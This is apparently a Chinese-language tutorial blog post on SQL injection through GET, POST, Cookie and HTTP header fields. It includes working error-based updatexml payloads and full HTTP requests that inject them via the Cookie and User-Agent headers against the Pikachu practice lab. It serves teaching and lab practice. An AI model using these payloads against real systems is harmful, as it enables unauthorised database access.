SQL注入漏洞之 提交方式类型注入 Get分类 Post分类 Cookie分类 请求数据位置分类 请求行 请求头 请求数据分类 靶场练习
目录
提交方式分类注入
是什么提交方式(PHP)
Cookie注入
语句
案例
SQL注入请求数据位置分类
在User-Agent输入
错误注入语句
案例
http注入存在于请求头中
Host注入
Referer注入
提交方式分类注入
Get分类
Post分类
Cookie分类
是什么提交方式(PHP)
-
开发后台 程序员就做好了代码的限制
-
这下面就存在cookie注入点
-
取值方式代码原理的解释
ASP:request (全部接受)
request.querystring (接受get)
request.form (接受post)
request.cookie cookie (接受cookie)
$_REQUEST(全部接受)
$_GET
$_POST (接受post)
$_COOKIE(接受cookie)
- #$_GET不是取get请求携带的数据
- 而是取得查询参数数据其他语言,看开发框架,不同的框架
- 提取http请求数据的写法或者说函数不同
$_GET 只要URL上面有参数都可以取出参数
$_POST 只能接受Post上面的数据
$_REQUEST(全部接受)这个安全性就有很大的问题
python django -- mvc -- request.GET requset.POST request.body
Cookie注入
-
这里是错误注入的效果:
使用错误语句进行操作
用常规语句是无法看到是注入后的效果
语句
' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #;
- 用 ' or 1=1# 看不出效果
案例
Cookie: ant[uname]=admin' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=edknf8j8tvgriv3oe0vis1ojq7
GET /pikachu/vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.6
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.6/pikachu/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)#; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=f1n45l5rga2i4og596mmlfr315
Upgrade-Insecure-Requests: 1
Priority: u=0, i
SQL注入请求数据位置分类
-
请求行
-
请求头
-
请求数据分类
-
php专门取请求头数据的
-
使用的方法是 $_SERVER['请求头键'] 就能拿到值只要服务端取出了请求头相关字段和数据库去打交到了
-
那么我们就可以获取到数据库的相关数据信息
-
在User-Agent输入
payload Mozilla' or updatexml(1,concat(0x7e,database()),0) or '
' and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) #;
错误注入语句
or updatexml(1,concat(0x7e,database()),0) or '
案例
GET /pikachu/vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.1.6
User-Agent: payload Mozilla' or updatexml(1,concat(0x7e,database()),0) or '
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.6/pikachu/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=f1n45l5rga2i4og596mmlfr315
Upgrade-Insecure-Requests: 1
Priority: u=0, i
http注入存在于请求头中
-
Host注入
-
Referer注入
-
基本上通过 and 1=2 and 1=1 来进行判断注入点
喜欢本文的请动动小手点个赞,收藏一下,有问题请下方评论,转载请注明出处,并附有原文链接,谢谢!如有侵权,请及时联系。